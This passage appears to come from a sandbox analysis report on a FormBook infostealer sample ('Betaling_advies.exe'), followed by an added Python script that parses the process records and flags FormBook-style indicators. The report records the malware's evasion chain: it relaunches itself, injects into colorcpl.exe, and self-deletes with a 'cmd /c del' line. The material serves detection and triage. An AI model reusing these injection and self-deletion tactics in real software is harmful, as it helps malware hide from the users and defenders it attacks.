• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.654811569.0000000002680000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.654811569.0000000002680000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.654811569.0000000002680000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: low

General

Start time: 12:37:34
Start date: 08/04/2021
Path: C:\Users\user\Desktop\Betaling_advies.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\Betaling_advies.exe'
Imagebase: 0x400000
File size: 206528 bytes
MD5 hash: 5011945CDEE260FB8688B06568D007B3
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000001.650199576.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000001.650199576.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000001.650199576.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.691540714.00000000009C0000.00000040.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.691540714.00000000009C0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.691540714.00000000009C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.690806042.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.690806042.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.690806042.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.692667485.0000000000D40000.00000040.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.692667485.0000000000D40000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.692667485.0000000000D40000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            Reputation:low

                                                                            General

                                                                            Start time:12:37:39
                                                                            Start date:08/04/2021
                                                                            Path:C:\Windows\explorer.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:
                                                                            Imagebase:0x7ff6fee60000
                                                                            File size:3933184 bytes
                                                                            MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high

                                                                            General

                                                                            Start time:12:37:53
                                                                            Start date:08/04/2021
                                                                            Path:C:\Windows\SysWOW64\colorcpl.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Windows\SysWOW64\colorcpl.exe
                                                                            Imagebase:0x180000
                                                                            File size:86528 bytes
                                                                            MD5 hash:746F3B5E7652EA0766BA10414D317981
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.910277347.0000000002530000.00000040.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.910277347.0000000002530000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.910277347.0000000002530000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.909643904.0000000000320000.00000004.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.909643904.0000000000320000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.909643904.0000000000320000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            Reputation:moderate

                                                                            General

                                                                            Start time:12:37:57
                                                                            Start date:08/04/2021
                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:/c del 'C:\Users\user\Desktop\Betaling_advies.exe'
                                                                            Imagebase:0x11d0000
                                                                            File size:232960 bytes
                                                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high

                                                                            General

                                                                            Start time:12:37:58
                                                                            Start date:08/04/2021
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff724c50000
                                                                            File size:625664 bytes
                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high

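Read together, the six records above describe the process chain FormBook typically produces: the sample restarts itself from the same path one second later and the second instance matches the same FormBook rules in its memory; explorer.exe appears with an empty command line; colorcpl.exe is launched from SysWOW64 and FormBook is matched in its memory even though its on-disk image is a Windows binary; finally cmd.exe runs `/c del` against the original file. The Python below is an added example, not code from Joe Sandbox or from this report, that parses records written in the report's own key:value layout and flags those three indicators. The input is transcribed from the records above with most of the Yara lines omitted, and the heuristics (the five-second relaunch window, treating any Yara match inside a `C:\Windows\` binary as an injection target, matching `cmd /c del` against the sample path) are choices made for this example.

```python
"""Parse the per-process 'General' records of a Joe Sandbox 'System Behavior'
section and flag the FormBook-style process chain. Added example, not Joe Sandbox code."""
import re
from dataclasses import dataclass, field

# Constructed input: the six records above in the report's own key:value layout.
# Only one or two Yara lines per process are kept; the report lists more.
REPORT = r"""
General
Start time:12:37:33
Path:C:\Users\user\Desktop\Betaling_advies.exe
Wow64 process (32bit):true
Commandline:'C:\Users\user\Desktop\Betaling_advies.exe'
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.654811569.0000000002680000.00000004.00000001.sdmp, Author: Joe Security
General
Start time:12:37:34
Path:C:\Users\user\Desktop\Betaling_advies.exe
Wow64 process (32bit):true
Commandline:'C:\Users\user\Desktop\Betaling_advies.exe'
Yara matches:
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.690806042.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
General
Start time:12:37:39
Path:C:\Windows\explorer.exe
Wow64 process (32bit):false
Commandline:
General
Start time:12:37:53
Path:C:\Windows\SysWOW64\colorcpl.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWOW64\colorcpl.exe
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.910277347.0000000002530000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.910277347.0000000002530000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
General
Start time:12:37:57
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:/c del 'C:\Users\user\Desktop\Betaling_advies.exe'
General
Start time:12:37:58
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
"""


@dataclass
class Proc:
    start: int = 0            # start time as seconds since midnight
    path: str = ""
    cmdline: str = ""
    wow64: bool = False
    yara: list = field(default_factory=list)   # matched rule names


def parse_report(text):
    """Split on 'General' headers and keep the fields the heuristics need."""
    procs, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "General":
            cur = Proc()
            procs.append(cur)
        elif cur is None or not line:
            continue
        elif line.startswith("Start time:"):
            h, m, s = (int(x) for x in line.split(":", 1)[1].split(":"))
            cur.start = h * 3600 + m * 60 + s
        elif line.startswith("Path:"):
            cur.path = line[len("Path:"):]
        elif line.startswith("Commandline:"):          # split once: paths contain ':'
            cur.cmdline = line.split(":", 1)[1]
        elif line.startswith("Wow64 process (32bit):"):
            cur.wow64 = line.endswith("true")
        elif line.startswith("• Rule:"):
            cur.yara.append(line.split(",", 1)[0][len("• Rule: "):])
    return procs


def find_indicators(procs, window=5):
    """Heuristics assumed for this example; returns (indicator, detail) pairs."""
    found = []
    samples = [p for p in procs if p.path.lower().startswith("c:\\users\\")]
    # 1. the sample relaunched from the same path within `window` seconds and the
    #    second instance matching the family in memory: the hollowed child
    for a, b in zip(samples, samples[1:]):
        if a.path == b.path and 0 <= b.start - a.start <= window and b.yara:
            found.append(("hollowed_self_copy", b.path))
    # 2. a Windows system binary whose memory matches the family: injection target
    for p in procs:
        if p.path.lower().startswith("c:\\windows\\") and p.yara:
            found.append(("injected_system_binary", p.path))
    # 3. cmd.exe '/c del' pointed at the sample's own path: self-removal
    for p in procs:
        if p.path.lower().endswith("\\cmd.exe"):
            m = re.search(r"/c\s+del\s+'?([^']+)'?", p.cmdline, re.I)
            if m and any(m.group(1).lower() == s.path.lower() for s in samples):
                found.append(("self_delete", m.group(1)))
    return found


if __name__ == "__main__":
    for name, detail in find_indicators(parse_report(REPORT)):
        print(f"{name}: {detail}")
```

On the transcribed records `find_indicators` returns the hollowed self-copy at the sample's path, colorcpl.exe as the injected system binary, and the self-delete of the sample. The second heuristic deliberately ignores explorer.exe, whose record lists no Yara match; in a real triage the injection into explorer.exe would have to be taken from the report's injection signatures rather than from this table alone.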
Disassembly

Code Analysis
